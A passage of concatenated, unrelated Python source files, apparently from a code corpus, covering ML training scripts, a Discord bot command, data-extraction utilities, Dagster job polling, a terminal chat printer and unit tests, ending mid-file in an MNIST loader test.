domain = np.linspace(lower, upper, (upper - lower) * 10)
domain = torch.tensor(domain).float().view(-1, 1)
outputs = number_net(domain)
softmax = F.softmax(outputs, 1)
max_values, output_labels = outputs.max(1)
softmax = softmax.detach().numpy()
# softmax = outputs.detach().numpy()
train_data, train_labels = numbers.data, numbers.labels
train_dict = defaultdict(list)
for train, la in zip(train_data, train_labels):
train_dict[la].append(train)
labels = [0, 1, 2, 3, 4]
domain_dict = defaultdict(list)
color_dict = dict()
colors = iter(cm.rainbow(np.linspace(0, 1, len(labels))))
for label in labels:
color_dict[label] = next(colors)
domain = domain.numpy()
output_labels = output_labels.numpy()
for do, la in zip(domain, output_labels):
domain_dict[la].append(do)
# for key in domain_dict:
# plt.scatter(domain_dict[key], [key] * len(domain_dict[key]), color=color_dict[key])
for label in labels:
plt.plot(domain, softmax[:, label], color=color_dict[label])
for label in labels:
plt.scatter(train_dict[label], [0] * len(train_dict[label]), color=color_dict[label])
plt.show()
def plot_loss(loss_history):
plt.plot(np.arange(0, len(loss_history)), loss_history)
plt.show()
if __name__ == "__main__":
# number_net = NumberNet()
#deep_number_net = DeepNumberNet()
dsig_net = DSigNet()
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(dsig_net.parameters(), lr=0.01, momentum=0.9)
# deep_optimizer = optim.SGD(number_net.parameter(), lr=0.01, momentum=0.9)
dataloader = DataLoader(Numbers(), shuffle=True, batch_size=5)
loss_history = list()
for epoch in range(100000):
running_loss = 0.0
for i, (data, labels) in enumerate(dataloader):
data, labels = Variable(data.float().view(-1, 1)), Variable(labels.long())
optimizer.zero_grad()
# deep_optimizer.zero_grad()
outputs = dsig_net(data)
loss = criterion(outputs, labels)
loss.backward()
optimizer.step()
running_loss += loss.item()
loss_history.append(running_loss)
print("Loss: " + str(running_loss))
print()
# for name, param in number_net.named_parameters():
# if param.requires_grad:
# print(name, param.data)
# print()
# print()
# Plot loss graph and decision boundaries
if epoch % 10000 == 0:
if epoch % 50000 == 0:
plot_loss(loss_history)
plot_decision_boundary(dsig_net)
input("To continue press enter")
| 7,425 | 2,424 |
import discord
from config import *
class ShutDown:
def __init__(self,message : discord.Message, bot : discord.Client()):
self.bot = bot
self.message = message
async def run(self):
if self.message.author.id in OWNER:
await self.message.channel.send('Shut down')
await self.bot.close() | 354 | 103 |
import textwrap
import click
def show_ugraph(ugraph, oneline=False, ignore_unknown_op=False):
from utensor_cgen.backend.utensor.code_generator.legacy._operators import OperatorFactory
unknown_ops = set([])
if oneline:
tmpl = click.style("{op_name} ", fg='yellow', bold=True) + \
"op_type: {op_type}, inputs: {inputs}, outputs: {outputs}"
for op_name in ugraph.topo_order:
op_info = ugraph.ops_info[op_name]
msg = tmpl.format(op_name=op_name, op_type=op_info.op_type,
inputs=[tensor.name for tensor in op_info.input_tensors],
outputs=[tensor.name for tensor in op_info.output_tensors])
click.echo(msg)
if not OperatorFactory.is_supported(op_info.op_type):
unknown_ops.add(op_info)
else:
tmpl = click.style('op_name: {op_name}\n', fg='yellow', bold=True) + \
'''\
op_type: {op_type}
input(s):
{inputs}
{input_shapes}
ouptut(s):
{outputs}
{output_shapes}
'''
tmpl = textwrap.dedent(tmpl)
paragraphs = []
for op_name in ugraph.topo_order:
op_info = ugraph.ops_info[op_name]
op_str = tmpl.format(
op_name=op_name,
op_type=op_info.op_type,
inputs=op_info.input_tensors,
outputs=op_info.output_tensors,
input_shapes=[tensor.shape for tensor in op_info.input_tensors],
output_shapes=[tensor.shape for tensor in op_info.output_tensors])
paragraphs.append(op_str)
if not OperatorFactory.is_supported(op_info.op_type):
unknown_ops.add(op_info)
click.echo('\n'.join(paragraphs))
click.secho(
'topological ordered ops: {}'.format(ugraph.topo_order),
fg='white', bold=True,
)
if unknown_ops and not ignore_unknown_op:
click.echo(
click.style('Unknown Ops Detected', fg='red', bold=True)
)
for op_info in unknown_ops:
click.echo(
click.style(' {}: {}'.format(op_info.name, op_info.op_type), fg='red')
)
return 0
| 2,018 | 725 |
# board.py
# abstract class for zorg and edge
import time
from ocan import *
class Board():
can_id = None
pause = True
ocan = None
def __init__(self, manifest):
self.manifest = manifest
self.ocan = OCan()
self.init_board()
self.init_filters()
self.boot()
def init_filters(self):
self.ocan._setfilter(0, (0,0) )
def init_board(self):
# setup Edge hardware (driven by manifest and driver)
if "driver" in self.manifest:
driver = self.manifest['driver']
print("init_board driver:", driver)
module = __import__(driver)
print("init_board module:", module)
driver = getattr( module, driver )
self.driver = driver()
# manifest parameters create 2 things:
# 1. list of names in edge.parameters
# 2. dict in driver.parameters
for parameter in self.manifest['parameters']:
self.parameters.append(parameter['name'])
driver.parameters[parameter['name']] = parameter
if "init" in self.manifest:
init = self.manifest['init']
print("init_board init:", init)
init = getattr(self.driver,init)
init()
def boot(self):
# Zorg just goes, Edge waits on Zorg
pass
| 1,396 | 383 |
import rob
import sys
# 1404927386.fasta analyzed_sequences.txt annotations.txt
#
faf=None
try:
faf=sys.argv[1]
except IndexError:
sys.stderr.write("Please provide a fasta file\n")
sys.exit(0)
fa = rob.readFasta(faf)
analyzed=[]
with open('analyzed_sequences.txt', 'r') as asf:
for line in asf:
pieces=line.rstrip()
analyzed.append(pieces)
if pieces not in fa:
sys.stderr.write(pieces + " has been analyzed but is not in " + faf + "\n")
for f in fa:
if f not in analyzed:
sys.stderr.write("NOT ANALYZED: " + f + "\n")
annotated=[]
with open('annotations.txt', 'r') as asf:
for line in asf:
pieces=line.split("\t")
annotated.append(pieces[0])
if pieces[0] not in fa:
sys.stderr.write(pieces[0] + " has been annotated but is not in " + faf + "\n")
for f in fa:
if f not in annotated:
sys.stderr.write("NOT ANNOTATED: " + f + "\n")
| 962 | 375 |
import os
import tqdm
import torch
import numpy as np
from parser import parse_args
from scene.data import DataSet
from torchtext.data import Iterator
from scene.data.loaders import BatchWrapper
from scene.models import BiLSTM
def predict(model, loader):
model.eval()
predictions = []
for data in tqdm.tqdm(loader):
pred = model(data)
_, pred = torch.max(pred.data, 1)
predictions.append(pred)
return np.array(predictions)
def main():
args = parse_args()
torch.manual_seed(args.seed)
use_cuda = not args.no_cuda and torch.cuda.is_available()
device = torch.device("cuda" if use_cuda else "cpu")
data = DataSet(args.datapath)
train_data, val_data, test_data = data.load_splits()
vocab = data.textfield.vocab
test_iter = Iterator(
test_data,
batch_size=1,
device=device,
sort=False,
sort_within_batch=False,
repeat=False
)
testloader = BatchWrapper(test_iter)
savepath = os.path.join(args.savepath, 'bilstm_small_val.pth')
savepoint = torch.load(savepath)
model = BiLSTM(num_vocab=len(vocab), n_classes=10).to(device)
model.load_state_dict(savepoint['model_state_dict'])
predictions = predict(model, test_iter)
outpath = os.path.join(args.savepath, 'test_preds.npy')
np.save(outpath, predictions)
if __name__=='__main__':
main() | 1,403 | 498 |
class Solution:
def numUniqueEmails(self, emails):
"""
:type emails: List[str]
:rtype: int
"""
email_set = set()
for email in emails:
local, domain = email.split('@')
local = local.replace('.', '')
if '+' in local:
local = local[:local.index('+')]
email_set.add(local + domain)
return len(email_set) | 423 | 119 |
# -*- coding: utf-8 -*-
"""
Unit tests for the RandomTester class.
@author: m.utting@uq.edu.au
"""
import unittest
import random
from pathlib import Path
import sklearn.utils.estimator_checks
from typing import Tuple, List, Set, Dict, Optional, Any
import agilkia
THIS_DIR = Path(__file__).parent
WSDL_EG = "http://www.soapclient.com/xml/soapresponder.wsdl"
test_input_rules = {
"username": ["User1"],
"password": ["<GOOD_PASSWORD>"] * 9 + ["bad-pass"],
"speed": [str(s) for s in range(0, 120, 10)],
"bstrParam1": ["VAL1"],
"bstrParam2": ["p2AAA", "p2BBB"],
}
class TestReadInputRules(unittest.TestCase):
def test_1(self):
rules = agilkia.read_input_rules(THIS_DIR / "fixtures/inputs1.csv")
self.assertEqual(["one"], rules["bstrParam1"])
self.assertEqual(['two', 'two', 'two', 'TWO!'], rules["bstrParam2"])
class TestRandomTester(unittest.TestCase):
def setUp(self):
self.tester = agilkia.RandomTester(
WSDL_EG,
input_rules=test_input_rules,
rand=random.Random(1234))
def test_input_user(self):
self.assertEqual("User1", self.tester.choose_input_value("username"))
def test_input_password(self):
self.assertEqual(agilkia.GOOD_PASSWORD, self.tester.choose_input_value("password"))
def test_input_speeds(self):
speeds = set()
for i in range(100):
speeds.add(self.tester.choose_input_value("speed"))
self.assertEqual(12, len(speeds)) # all results should be covered
def test_signature(self):
sig = self.tester.get_methods()
self.assertEqual(1, len(sig))
self.assertEqual({"Method1"}, sig.keys())
msig = sig["Method1"]
self.assertEqual(1, len(msig))
self.assertEqual({"input"}, msig.keys())
self.assertEqual({"bstrParam1", "bstrParam2"}, msig["input"].keys())
param1_details = "{'optional': False, 'type': 'String(value)'}"
self.assertEqual(param1_details, str(msig["input"]["bstrParam1"]))
def test_dummy_client_meta(self):
"""Test the dummy web service provided by soapresponder."""
tester = agilkia.RandomTester(WSDL_EG,
input_rules=test_input_rules,
rand=random.Random(1234))
meta_keys = ["date", "author", "dataset", "source",
"web_services", "methods_to_test", "input_rules",
"method_signatures"]
mdata = tester.trace_set.meta_data
for k in meta_keys:
self.assertTrue(k in mdata, msg=k + " expected in meta_data")
self.assertEqual(f"RandomTester", mdata["source"])
self.assertEqual([WSDL_EG], mdata["web_services"])
# check the signature
self.assertEqual(set(["Method1"]), set(mdata["method_signatures"].keys()))
sig = {'input': {
'bstrParam1': {'optional': False, 'type': 'String(value)'},
'bstrParam2': {'optional': False, 'type': 'String(value)'}}}
self.assertEqual(sig, mdata["method_signatures"]["Method1"])
def test_dummy_client0(self):
"""Test the dummy web service provided by soapresponder."""
tester = agilkia.RandomTester(WSDL_EG, verbose=True,
input_rules=test_input_rules,
rand=random.Random(1234))
print("Methods:", tester.get_methods())
out1 = tester.call_method("Method1")
expect = {"Status": 0, "value": "Your input parameters are VAL1 and p2AAA"}
self.assertEqual(expect, out1.outputs)
out1 = tester.call_method("Method1")
self.assertEqual(expect, out1.outputs)
out1 = tester.call_method("Method1")
self.assertEqual(expect, out1.outputs)
out1 = tester.call_method("Method1")
expect["value"] = "Your input parameters are VAL1 and p2BBB"
self.assertEqual(expect, out1.outputs)
self.assertEqual(4, len(tester.curr_events))
self.assertEqual(1, len(tester.trace_set.traces))
# now generate a second trace
tester.generate_trace(start=True, length=3)
self.assertEqual(3, len(tester.curr_events))
self.assertEqual(2, len(tester.trace_set.traces))
# now test saving and loading those traces.
traceset1 = tester.trace_set
tmp_json = Path("tmp_dummy1.json")
traceset1.save_to_json(tmp_json)
traceset2 = agilkia.TraceSet.load_from_json(tmp_json)
self.assertEqual(traceset2.meta_data, traceset1.meta_data)
self.assertEqual(len(traceset2.traces), len(traceset1.traces))
self.assertEqual(traceset2.traces[0].events[0].action,
traceset1.traces[0].events[0].action)
tmp_json.unlink()
def test_generate_trace(self):
tr = self.tester.generate_trace()
self.assertTrue(isinstance(tr, agilkia.Trace))
self.assertEqual(20, len(tr.events))
def test_decode_outputs(self):
self.assertEqual({'Status': 0, "value": "abc"}, self.tester.decode_outputs("abc"))
self.assertEqual({'Status': 0, "a": 2}, self.tester.decode_outputs({"a": 2}))
# Also, zeep XML object outputs are tested in test_dummy_client0 above.
class TestTracePrefixExtractor(unittest.TestCase):
ev1 = agilkia.Event("Order", {"Name": "Mark"}, {"Status": 0})
ev2 = agilkia.Event("Skip", {"Size": 3}, {"Status": 1, "Error": "Too big"})
ev3 = agilkia.Event("Pay", {"Name": "Mark", "Amount": 23.45}, {"Status": 0})
def test_bag_of_words(self):
tr1 = agilkia.Trace([self.ev1, self.ev2])
tr2 = agilkia.Trace([self.ev3])
traces = agilkia.TraceSet([tr1, tr1, tr2])
self.assertEqual(3, len(traces))
sut = agilkia.TracePrefixExtractor()
sut.fit(traces)
self.assertEqual(["Order", "Pay", "Skip"], sut.get_feature_names())
X = sut.transform(traces)
y = sut.get_labels()
self.assertEqual((8, 3), X.shape)
self.assertEqual(8, len(y))
for row in [0, 3, 6]:
self.assertEqual([0.0, 0.0, 0.0], X.iloc[row, :].tolist())
self.assertEqual("Order" if row < 6 else "Pay", y[row])
for row in [2, 5]:
self.assertEqual([1.0, 0.0, 1.0], X.iloc[row, :].tolist())
self.assertEqual(agilkia.TRACE_END, y[row])
self.assertEqual([0.0, 1.0, 0.0], X.iloc[7, :].tolist())
def test_bag_of_words_custom(self):
"""Test TracePrefixExtractor with a custom event-to-string function."""
def custom(ev): return ev.inputs.get("Name", "???")
tr1 = agilkia.Trace([self.ev1, self.ev2])
tr2 = agilkia.Trace([self.ev3, self.ev3])
traces = agilkia.TraceSet([tr1, tr1, tr2])
self.assertEqual(3, len(traces))
self.assertEqual("Mark", custom(self.ev1))
self.assertEqual("???", custom(self.ev2))
sut = agilkia.TracePrefixExtractor(custom)
sut.fit(traces)
self.assertEqual(["???", "Mark"], sut.get_feature_names())
X = sut.transform(traces)
y = sut.get_labels()
self.assertEqual((9, 2), X.shape)
self.assertEqual(9, len(y))
for row in [0, 3, 6]:
self.assertEqual([0.0, 0.0], X.iloc[row, :].tolist())
self.assertEqual(custom(traces[row // 3][0]), y[row])
for row in [2, 5]:
self.assertEqual([1.0, 1.0], X.iloc[row, :].tolist())
self.assertEqual(agilkia.TRACE_END, y[row])
self.assertEqual([0.0, 2.0], X.iloc[8, :].tolist())
def test_custom_subclass(self):
"""Test TracePrefixExtractor subclass with a custom encoder that::
- counts Order events
- sums all 'Size' inputs
- reports the current action (0=Order, 1=Skip, 2=Pay)
- and learns status output values.
"""
action2num = {"Order": 0, "Skip": 1, "Pay": 2}
class MyPrefixExtractor(agilkia.TracePrefixExtractor):
def generate_feature_names(self, trace: agilkia.Trace) -> Set[str]:
return {"Orders", "TotalSize", "CurrAction"}
def generate_prefix_features(self, events: List[agilkia.Event],
current: Optional[agilkia.Event]) -> Tuple[Dict[str, float], Any]:
total = sum([ev.inputs.get("Size", 0) for ev in events])
orders = len([ev.action for ev in events if ev.action == "Order"])
if current is not None:
action = action2num[current.action]
learn = current.status
else:
action = -1
learn = -1
return {"Orders": orders, "TotalSize": total, "CurrAction": action}, learn
tr1 = agilkia.Trace([self.ev1, self.ev2, self.ev2, self.ev1])
tr2 = agilkia.Trace([self.ev3, self.ev3])
traces = agilkia.TraceSet([tr1, tr2])
# now run the encoder
sut = MyPrefixExtractor()
sut.fit(traces)
self.assertEqual(["CurrAction", "Orders", "TotalSize"], sut.get_feature_names())
X = sut.transform(traces)
y = sut.get_labels()
self.assertEqual((8, 3), X.shape)
self.assertEqual(8, len(y))
# tr1 prefixes
self.assertEqual([0, 0, 0], X.iloc[0, :].tolist())
self.assertEqual([1, 1, 0], X.iloc[1, :].tolist())
self.assertEqual([1, 1, 3], X.iloc[2, :].tolist())
self.assertEqual([0, 1, 6], X.iloc[3, :].tolist())
self.assertEqual([-1, 2, 6], X.iloc[4, :].tolist())
self.assertEqual([0, 1, 1, 0, -1], y[0:5])
# tr2 prefixes
self.assertEqual([2, 0, 0], X.iloc[5, :].tolist())
self.assertEqual([2, 0, 0], X.iloc[6, :].tolist())
self.assertEqual([-1, 0, 0], X.iloc[7, :].tolist())
self.assertEqual([0, 0, -1], y[5:])
| 9,926 | 3,436 |
# extract the Salamunnicar data from the XLS file
import pandas as pd
import pkg_resources
import logging
import os
def extract_salamuniccar(filename, tables=None,
output_prefix=None,
output_filename=None):
"""Extract the lat,long, diameter from the Salamuniccar catalogs."""
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
logger.info("Reading Excel file")
logger.info(output_filename)
dfe = pd.ExcelFile(filename)
names = [x for x in dfe.sheet_names if
x != "YourCatalogue" and x != "Macros"]
tables = tables or names
if isinstance(tables, str):
tables = [tables]
output_prefix = output_prefix or "GS_"
mapping_name = pkg_resources.resource_filename('cratertools',
'data/salamuniccar_mapping.csv',)
mapping = pd.read_csv(mapping_name, index_col=0)
for name in tables:
logger.info("Processing table : {}".format(name))
df = pd.read_excel(filename, name)
outname = output_prefix+name
df.to_hdf(outname, "/"+name)
if output_filename is None:
continue
print(name, mapping.index)
if name in mapping.index:
d = mapping[mapping.index == name]
v, k = d.columns.values, d.values[0]
df = df.loc[:, k]
df.rename(columns=dict(zip(k, v)),
inplace=True)
# warp the longitude
df["Long"][df["Long"] > 180] -= 360
df = df.dropna()
df.to_hdf(output_filename, name,
append=os.path.exists(output_filename), complevel=5)
def extract_robbins(filename, output_filename=None):
"""Extract the lat,long, diameter from the robbins catalog."""
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
logger.info("Reading Robbins data")
robbins = pd.read_table(filename, engine="python", delimiter="\t")
mapping_name = pkg_resources.resource_filename('cratertools',
'data/salamuniccar_mapping.csv',)
mapping = pd.read_csv(mapping_name, index_col=0)
d = mapping[mapping.index == "Robbins"]
v, k = d.columns.values, d.values[0]
robbins = robbins[k]
robbins.rename(columns=dict(zip(k, v)), inplace=True)
if output_filename is not None:
robbins.to_hdf(output_filename, "/Robbins",
append=os.path.exists(output_filename), index=False)
| 2,576 | 787 |
from ARLO.environment.environment import * | 42 | 11 |
from typing import Optional
from dagster import solid, Int, Failure, Nothing, configured, String, DagsterLogManager
from dagster.core.execution.context.compute import AbstractComputeExecutionContext
from dagster_utils.typing import DagsterConfigDict
from data_repo_client import JobModel, ApiException, RepositoryApi
from hca_manage.common import JobId
from hca_orchestration.contrib.retry import is_truthy, retry
class DataFileIngestionFailure(Failure):
pass
@solid(
required_resource_keys={"data_repo_client"},
config_schema={
'max_wait_time_seconds': Int,
'poll_interval_seconds': Int,
}
)
def base_check_data_ingest_job_result(context: AbstractComputeExecutionContext, job_id: JobId) -> JobId:
job_results = _base_check_jade_job_result(
context.solid_config['max_wait_time_seconds'],
context.solid_config['poll_interval_seconds'],
job_id,
context.resources.data_repo_client,
context.log
)
if job_results['failedFiles'] > 0:
raise DataFileIngestionFailure(
f"Bulk file load (job_id = {job_id} had failedFiles = {job_results['failedFiles']})")
return job_id
@configured(base_check_data_ingest_job_result)
def check_data_ingest_job_result(config: DagsterConfigDict) -> DagsterConfigDict:
"""
Polls the bulk file ingest results
Any files failed will fail the pipeline
"""
return {
'max_wait_time_seconds': 28800, # 8 hours
'poll_interval_seconds': 5
}
@solid(
required_resource_keys={"data_repo_client"},
config_schema={
'max_wait_time_seconds': Int,
'poll_interval_seconds': Int,
}
)
def check_table_ingest_result(context: AbstractComputeExecutionContext, job_id: JobId) -> JobId:
job_results = _base_check_jade_job_result(
context.solid_config['max_wait_time_seconds'],
context.solid_config['poll_interval_seconds'],
job_id,
context.resources.data_repo_client,
context.log
)
if job_results['bad_row_count'] == '0':
raise Failure(f"Bulk file load (job_id = {job_id} had failedFiles = {job_results['failedFiles']})")
return job_id
@configured(check_table_ingest_result)
def check_table_ingest_job_result(config: DagsterConfigDict) -> DagsterConfigDict:
"""
Polls the bulk file ingest results
Any files failed will fail the pipeline
"""
return {
'max_wait_time_seconds': 600, # 10 minutes
'poll_interval_seconds': 5,
}
def _base_check_jade_job_result(
max_wait_time_seconds: int,
poll_interval_seconds: int,
job_id: JobId,
data_repo_client: RepositoryApi,
logger: DagsterLogManager
) -> Nothing:
# we need to poll on the endpoint as a workaround for a race condition in TDR (DR-1791)
def __fetch_job_results(jid: JobId) -> Optional[JobModel]:
try:
logger.info(f"Fetching job results for job_id = {jid}")
return data_repo_client.retrieve_job_result(jid)
except ApiException as ae:
if 500 <= ae.status <= 599:
logger.info(f"Data repo returned error when fetching results for job_id = {jid}, scheduling retry")
return None
raise
job_results = retry(
__fetch_job_results,
max_wait_time_seconds,
poll_interval_seconds,
is_truthy,
job_id
)
if not job_results:
raise Failure(f"No job results after polling bulk ingest, job_id = {job_id}")
return job_results
| 3,558 | 1,141 |
#
# Author: Igor Ivanov
# 2019
#
import time
import os
from termcolor import colored
from datetime import datetime
import colorama
colorama.init()
"""
Small print tool for implementing chat in the terminal
"""
class print_chat:
def _clear_screen(self):
os.system('cls' if os.name == 'nt' else 'clear')
def clear_row(self):
print('\r' + ' ' * os.get_terminal_size().columns + '\r', end='')
def up_on_rows(self, number):
self.clear_row
print(('\x1b[A\r' + ' ' * os.get_terminal_size().columns + '\r') * number, end='')
def up_on_message(self, number):
n = self.__get_lines(number)
self.up_on_rows(n)
def up_on_occupied_rows(self, len_str):
lines = ((len_str-1) // os.get_terminal_size().columns) + 1
self.up_on_rows(lines)
def down_on_rows(self, number):
self.clear_row()
print(('\n\r' + ' ' * os.get_terminal_size().columns + '\r') * number, end='')
def get_num_messages(self):
return(len(self.MESSAGES))
def get_messages_from(self, sender):
out = ()
for i in self.MESSAGES:
if i['sender'] == sender:
out.append(i)
return out
def get_messages(self):
return self.MESSAGES
def get_message(self, number):
if number <= len(self.MESSAGES):
return self.MESSAGES[len(self.MESSAGES) - number]
def get_senders(self):
out = ()
for key in self.senders.keys():
out.append(key)
return out
def get_mark(self, number):
return self.MESSAGES[len(self.MESSAGES) - number]['mark']
def set_colors(self, colors):
found = False
for color in colors:
for i in range(len(self.senders)):
if self.senders[i]['sender'] == color[0]:
self.senders[i]['color'] = color[1]
found = True
if not found:
if len(color) == 1:
self.senders.append({
'sender': color[0],
'color': 'grey',
})
else:
self.senders.append({
'sender': color[0],
'color': color[1],
})
def get_time(self):
if not self.time_full:
return datetime.today().strftime("%H:%M")
else:
return datetime.today().strftime("%d.%m.%y %H:%M")
def set_header(self, text):
self.header = text.split('\n')
self._print_header()
def _print_header(self):
self._clear_screen()
for i in self.header:
print(i)
# returns the number of lines that must be passed to move the cursor to the specified message
def __get_lines(self, number):
lines = 0
for i in range(number):
# counting the number of lines occupied by a message
m = self.MESSAGES[(len(self.MESSAGES)-1) - i]
l = (len(m['sender']) + len(m['text']) + len(m['mark']) + self.len_frame)
# count the number of lines occupied by a skip
s = 0
for j in m['skip']:
j = str(j)
if isinstance(j, str):
for k in j.split('\n'):
s += ((len(k)-1) // os.get_terminal_size().columns) + 1
else:
s += ((len(j)-1) // os.get_terminal_size().columns) + 1
lines += (((l-1) // os.get_terminal_size().columns) + 1) + s
return lines
def _print_mess(self, sender, text, time, skip, mark):
if self.is_time:
print('[{}] '.format(time), end='')
# color selection for printing sender name
c0, c1 = 'white', 'grey'
found = False
for i in self.senders:
if i['sender'] == sender:
c = i['color']
if c == 'grey':
c0, c1 = 'white', 'grey'
else:
c0, c1 = 'grey', c
break
found = True
if not found:
self.senders.append({
'sender': sender,
'color': 'grey',
})
print(colored('[' + sender + ']', c0, ('on_' + c1)) + ': ', end='')
print('{}{}'.format(text, ''.join(mark)), end='\n')
for i in skip:
print(i)
def add_mark(self, number, mark):
if not mark == '' and number > 0 and number <= len(self.MESSAGES):
self.up_on_message(number)
m = self.MESSAGES[len(self.MESSAGES)-number]['mark']
if not m:
self.MESSAGES[len(self.MESSAGES)-number].update({
'mark': [str(mark)]
})
else:
m.append(str(mark))
self.MESSAGES[len(self.MESSAGES)-number].update({
'mark': m
})
self._load(number)
def edit_mark(self, number, mark):
if number > 0 and number <= len(self.MESSAGES):
if mark == '':
self.remove_mark(number)
else:
n = len(self.MESSAGES) - number
self.up_on_message(number)
self.MESSAGES[n].update({
'mark': [str(mark)]
})
self._load(number)
def remove_mark(self, number):
if number > 0 and number <= len(self.MESSAGES):
n = len(self.MESSAGES) - number
self.up_on_message(number)
self.MESSAGES[n].update({
'mark': []
})
self._load(number)
def has_mark(self, number):
n = len(self.MESSAGES) - number
if self.MESSAGES[n]['mark'] == []:
return False
else:
return True
def get_mark(self, number):
n = len(self.MESSAGES) - number
return self.MESSAGES[n]['mark']
def add_skip(self, number, text):
if not text == '' and number > 0 and number <= len(self.MESSAGES):
self.up_on_message(number)
m = self.MESSAGES[len(self.MESSAGES)-number]['skip']
if not m:
self.MESSAGES[len(self.MESSAGES)-number].update({
'skip': [str(text)]
})
else:
m.append(str(text))
self.MESSAGES[len(self.MESSAGES)-number].update({
'skip': m
})
self._load(number)
def edit_skip(self, number, text):
if number > 0 and number <= len(self.MESSAGES):
if text == '':
self.remove_skip(number)
else:
self.up_on_message(number)
self.MESSAGES[len(self.MESSAGES) - number].update({
'skip': [str(text)]
})
self._load(number)
def remove_skip(self, number):
if number > 0 and number <= len(self.MESSAGES):
self.up_on_message(number)
self.MESSAGES[len(self.MESSAGES) - number].update({
'skip': []
})
self._load(number)
def has_skip(self, number):
if self.MESSAGES[len(self.MESSAGES) - number]['skip'] == []:
return False
else:
return True
# reprints the specified number of messages
def reload(self, number):
if number > 0 and number < len(self.MESSAGES):
self.up_on_message(number)
self._load(number)
elif number == len(self.MESSAGES):
self._clear_screen()
self._print_header()
self._load(number)
def _load(self, number):
if number > 0 and number <= len(self.MESSAGES):
for m in self.MESSAGES[len(self.MESSAGES)-number:len(self.MESSAGES)]:
self._print_mess(m['sender'], m['text'], m['time'], m['skip'], m['mark'])
def remove(self, number):
if number > 0 and number <= len(self.MESSAGES):
self.up_on_message(number)
self._load(number-1)
self.MESSAGES.pop(len(self.MESSAGES) - number)
def edit(self, number, text):
if number > 0 and number <= len(self.MESSAGES):
if text == '':
self.remove(number)
else:
n = len(self.MESSAGES) - number
self.up_on_message(number)
self.MESSAGES[n].update({
'text': text
})
self._load(number)
def add_message_top(self, sender, text, time='', skip=[], mark=[], prnt=True):
text = " ".join(str(text).split())
if text != '':
if time == '':
time = self.get_time()
self.MESSAGES.insert(0, {
'sender': sender,
'text': text,
'time': time,
'skip': skip,
'mark': mark,
})
if prnt:
self.up_on_message(self.get_num_messages() - 1)
self._print_mess(sender, text, time, skip, mark)
self._load(self.get_num_messages()-1)
def add_message(self, sender, text, time='', skip=[], mark=[]):
text = " ".join(str(text).split())
if text != '':
if time == '':
time = self.get_time()
self.MESSAGES.append({
'sender': sender,
'text': text,
'time': time,
'skip': skip,
'mark': mark,
})
self._print_mess(sender, text, time, skip, mark)
def close(self, clr=False):
self.MESSAGES.clear()
self.senders.clear()
print('\x1b[A\r', end='')
if clr:
self._clear_screen()
def __init__(self, time=False):
self.MESSAGES = []
self.senders = []
self.header = []
self.is_time = False
self.time_full = False
if time == 'short':
self.len_frame = 4 + 8
self.is_time = True
elif time == 'full':
self.len_frame = 4 + 8 + 9
self.is_time = True
self.time_full = True
else:
self.len_frame = 4
self._clear_screen()
| 10,533 | 3,237 |
"""
This class is used by test_pageobjects
"""
from cumulusci.robotframework.pageobjects import ListingPage, pageobject
# The point of this class is to test out using an alias
@pageobject(page_type="Listing", object_name="Custom Object")
class CustomObjectListingPage(ListingPage):
_object_name = "CustomObject__c"
| 321 | 95 |
logreg_params = dict(multi_class='ovr',
class_weight=None,
random_state=43,
max_iter=300,
n_jobs=-1,
penalty='l2',
C=0.5)
rnn_params = dict(
# Пути к данным
df="../coleridgeinitiative-show-us-the-data/train_splitted.csv",
vectorizer_file="vectorizer.json",
model_state_file="model.pth",
save_dir="../models",
# Гиперпараметры архитектуры нейросети
char_embedding_size=64,
rnn_hidden_size=16,
# Гиперпараметры тренировки нейросети
num_epochs=300,
learning_rate=1e-2,
batch_size=32,
seed=1337,
early_stopping_criteria=5,
# Runtime hyper parameter
cuda=True,
catch_keyboard_interrupt=True,
reload_from_files=False,
expand_filepaths_to_save_dir=True
) | 850 | 308 |
from typing import NoReturn, Union
import ziopy.services.console as console
import ziopy.services.system as system
from ziopy.environments import ConsoleSystemEnvironment
from ziopy.services.console import Console, LiveConsole
from ziopy.zio import ZIO, ZIOMonad, monadic, unsafe_run, Environment
@monadic
def program(
do: ZIOMonad[Console, Union[EOFError, KeyboardInterrupt]]
) -> ZIO[
Console,
Union[EOFError, KeyboardInterrupt],
str
]:
con = do << Environment()
do << con.print("Hello, what is your name?")
name = do << con.input()
do << con.print(f"Your name is: {name}")
x = do << ZIO.succeed(1)
while x < 20:
x = do << (
ZIO.succeed(x)
.map(lambda p: p + 1)
.flat_map(lambda q: ZIO.succeed(q - 1))
.flat_map(lambda r: ZIO.succeed(r + 1))
)
do << con.print(f"The value of x is: {x}")
return ZIO.succeed(f"Hello, {name}!")
p = program().provide(LiveConsole())
final_result = unsafe_run(p)
print(f"Final result (1) is: {final_result}")
# You can run the same program (value) over and over again.
final_result_2 = unsafe_run(p)
print(f"Final result (2) is: {final_result_2}")
@monadic
def prog(
do: ZIOMonad[ConsoleSystemEnvironment, NoReturn]
) -> ZIO[ConsoleSystemEnvironment, NoReturn, int]:
age = do << console.get_input_from_console(
prompt="How old are you?\n",
parse_value=ZIO.from_callable(str).map(int).catch(ValueError).either().to_callable(),
default_value=21
)
do << console.print(f"You are {age} years old.")
return ZIO.succeed(age)
unsafe_run(
prog().provide(
ConsoleSystemEnvironment(console=LiveConsole(), system=system.LiveSystem())
)
)
| 1,741 | 610 |
import os
import struct
import unittest
import numpy as np
#
# based on https://gist.github.com/akesling/5358964
# Which contains comment.
# > Loosely inspired by http://abel.ee.ucla.edu/cvxopt/_downloads/mnist.py
# > which is GPL licensed.
#
class MNistLoader:
@classmethod
def read_mnist(cls,
training=True,
path="."):
if training:
fname_img = os.path.join(path, 'train-images.idx3-ubyte')
fname_lbl = os.path.join(path, 'train-labels.idx1-ubyte')
else:
fname_img = os.path.join(path, 't10k-images.idx3-ubyte')
fname_lbl = os.path.join(path, 't10k-labels.idx1-ubyte')
# Load everything in some numpy arrays
with open(fname_lbl, 'rb') as flbl:
_, _ = struct.unpack(">II", flbl.read(8))
lbl = np.fromfile(flbl, dtype=np.int8)
with open(fname_img, 'rb') as fimg:
magic, num, rows, cols = struct.unpack(">IIII", fimg.read(16))
img = np.fromfile(fimg, dtype=np.uint8).reshape(len(lbl), rows, cols)
return img, lbl
#
# Unit Tests.
#
class TestMNISTLoader(unittest.TestCase):
#
# Test Image Load.
#
def test_0(self):
ml = MNistLoader()
img, lbl = ml.read_mnist(training=True,
